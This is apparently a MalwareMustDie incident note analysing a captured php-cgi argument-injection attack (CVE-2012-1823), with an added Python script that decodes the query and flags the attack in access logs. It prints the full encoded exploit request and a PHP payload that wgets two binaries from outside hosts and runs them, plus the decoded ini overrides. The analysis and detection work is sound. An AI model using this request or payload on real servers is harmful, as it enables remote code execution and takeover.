I'm a mu mu mu? Just a Crap!

MalwareMustDie | Jul 27th, 2014
// #MalwareMustDie sCRAPnote
// I'm a mu mu mu ? It's a lamer's crap!

POST /cgi-bin/phpinfo.php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: I`m a mu mu mu ?
Content-Type: application/x-www-form-urlencoded
Content-Length: 502
Connection: close

<?php
$tmp = sys_get_temp_dir();
$path = getcwd();
$file = "e.html";
$url = "http://eleven11root.servepics.com";
system("wget $url -P - -O" . $tmp . "/e.html");
system("chmod -R 777" . $tmp ."/e.html");
chmod ($tmp."/".$file,0777);
system($tmp . "/e.html");
$file2 = "t.htm";
$url2 = "http://twelfe12root.servepics.com";
system("wget $url2 -P - -O" . $tmp . "/t.htm");
system("chmod -R 777" . $tmp ."/t.htm");
chmod ($tmp."/".$file2,0777);
system($tmp . "/t.htm");
echo $tmp;
echo $path;
die($tmp);

/* infected site: dropped binaries */
wget http://eleven11root.servepics.com -P - -O ./e.html
wget http://twelfe12root.servepics.com -P - -O ./t.html

/* header checks */
--2014-07-25 12:48:57--  http://twelfe12root.servepics.com/
Resolving twelfe12root.servepics.com... 8.23.224.90
Caching twelfe12root.servepics.com => 8.23.224.90
Connecting to twelfe12root.servepics.com|8.23.224.90|:80... connected.
Created socket 4.
Releasing 0x00007fc878404890 (new refcount 1).
GET / HTTP/1.1
User-Agent: MMDBangsMyget/1.14 (MalwareMustDie12.2.1)
Accept: */*
Host: twelfe12root.servepics.com
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 302 Found
Date: Fri, 25 Jul 2014 03:48:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Location: http://127.0.0.1
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
302 Found
Location: http://127.0.0.1 [following]
Closed fd 4
Connecting to 127.0.0.1:80... Closed fd 4
failed: Connection refused.
Releasing 0x00007fc878403ed0 (new refcount 0).
Deleting unused 0x00007fc878403ed0.

/* Encoding analysis: the query string is plain URL (percent) encoding, not encryption */
%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E

/* crack result */
https://twitter.com/MalwareMustDie/status/492534140340682754
Decoded ('+' is a space, %XX is a byte):
-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env="yes" -d cgi.fix_pathinfo=1 -d auto_prepend_file=php://input -n
These are php-cgi command-line overrides: auto_prepend_file=php://input makes the POST body above run as PHP, and the rest switch off disable_functions, open_basedir and safe_mode so that system() and wget are free to drop and run the two files.

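Added example, not part of the original #MalwareMustDie note. It shows why the query above is percent-encoded at all: a CGI server only hands the query string to the script as argv when it contains no unencoded '=' (RFC 3875 section 4.4, split on '+', then decode each word), which is the php-cgi argument-injection bug (CVE-2012-1823). The block rebuilds argv that way from the captured query, pairs up the '-d' php.ini overrides, flags the ones that make the POST body executable, and runs the same check over three constructed access-log lines (the IPs and timestamps are made up; the first line wraps the captured request, the second uses the '?-s' source-disclosure form of the same bug, the third is an ordinary form query).

```python
"""Decode and triage a php-cgi argument-injection query (added example)."""
from __future__ import annotations

import re
from urllib.parse import unquote

# Query string exactly as captured in the note, split here for readability.
CAPTURED_QUERY = (
    "%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+"
    "%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+"
    "%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+"
    "%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+"
    "%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+"
    "%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+"
    "%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+"
    "%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+"
    "%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+"
    "%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+"
    "%2D%6E"
)


def query_to_argv(query: str) -> list[str]:
    """Rebuild argv the way mod_cgi does: only a query with no unencoded '='
    is split on '+' and decoded word by word. A normal form query yields []."""
    if "=" in query:
        return []
    return [unquote(word) for word in query.split("+") if word]


def decoded_query(query: str = CAPTURED_QUERY) -> str:
    """Human-readable form of the argv (words joined by single spaces)."""
    return " ".join(query_to_argv(query))


def ini_overrides(argv: list[str]) -> dict[str, str]:
    """Collect '-d key=value' pairs; a repeated key keeps the last value, as php does."""
    overrides: dict[str, str] = {}
    for flag, setting in zip(argv, argv[1:]):
        if flag == "-d" and "=" in setting:
            key, _, value = setting.partition("=")
            overrides[key] = value.strip('"')
    return overrides


def rce_indicators(overrides: dict[str, str]) -> list[str]:
    """Name the overrides that turn the request body into unrestricted PHP."""
    hits = []
    if overrides.get("auto_prepend_file", "").startswith("php://input"):
        hits.append("auto_prepend_file=php://input executes the POST body")
    if overrides.get("allow_url_include", "").lower() in ("on", "1"):
        hits.append("allow_url_include=on lets php://input be included")
    if overrides.get("disable_functions") == "":
        hits.append("disable_functions cleared, system() re-enabled")
    if overrides.get("open_basedir", "").lower() == "none":
        hits.append("open_basedir=none removes the filesystem jail")
    if overrides.get("safe_mode", "").lower() == "off":
        hits.append("safe_mode=off")
    return hits


# Request field of an Apache combined-format line: method, path, optional query.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+?)(?:\?(?P<query>\S*))? HTTP/[\d.]+"')


def triage_log_line(line: str) -> dict:
    """Return the argv the server would have built and the RCE indicators found."""
    m = LOG_RE.search(line)
    if not m or m.group("query") is None:
        return {"argv": [], "hits": []}
    argv = query_to_argv(m.group("query"))
    if not argv or not argv[0].startswith("-"):
        return {"argv": [], "hits": []}
    hits = rce_indicators(ini_overrides(argv))
    if "-s" in argv:
        hits.append("-s dumps the target script's source")
    return {"argv": argv, "hits": hits}


# Constructed sample log lines (documentation-range IPs, invented timestamps).
SAMPLE_LOG = [
    f'198.51.100.7 - - [25/Jul/2014:03:48:58 +0000] "POST /cgi-bin/phpinfo.php?{CAPTURED_QUERY} HTTP/1.1" 200 19 "-" "I`m a mu mu mu ?"',
    '198.51.100.7 - - [25/Jul/2014:03:49:02 +0000] "GET /cgi-bin/php?%2D%73 HTTP/1.1" 200 880 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [25/Jul/2014:03:49:10 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def triage_all(lines: list[str] = SAMPLE_LOG) -> list[dict]:
    return [triage_log_line(line) for line in lines]


if __name__ == "__main__":
    print(decoded_query())
    for line, result in zip(SAMPLE_LOG, triage_all()):
        print(line.split('"')[1], "->", result["hits"] or "clean")
```

The '=' test in query_to_argv is the whole detection: any request whose query decodes to argv starting with '-' against a CGI PHP endpoint deserves a look, and the '-d' pairs tell you whether the body was meant to run.
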
/* status */
CNC was knocked down by the @MMD Tango Team
different case, same incident: http://pastebin.com/VePW1zGP

#MalwareMustDie | cracked & reported by @unixfreaxjp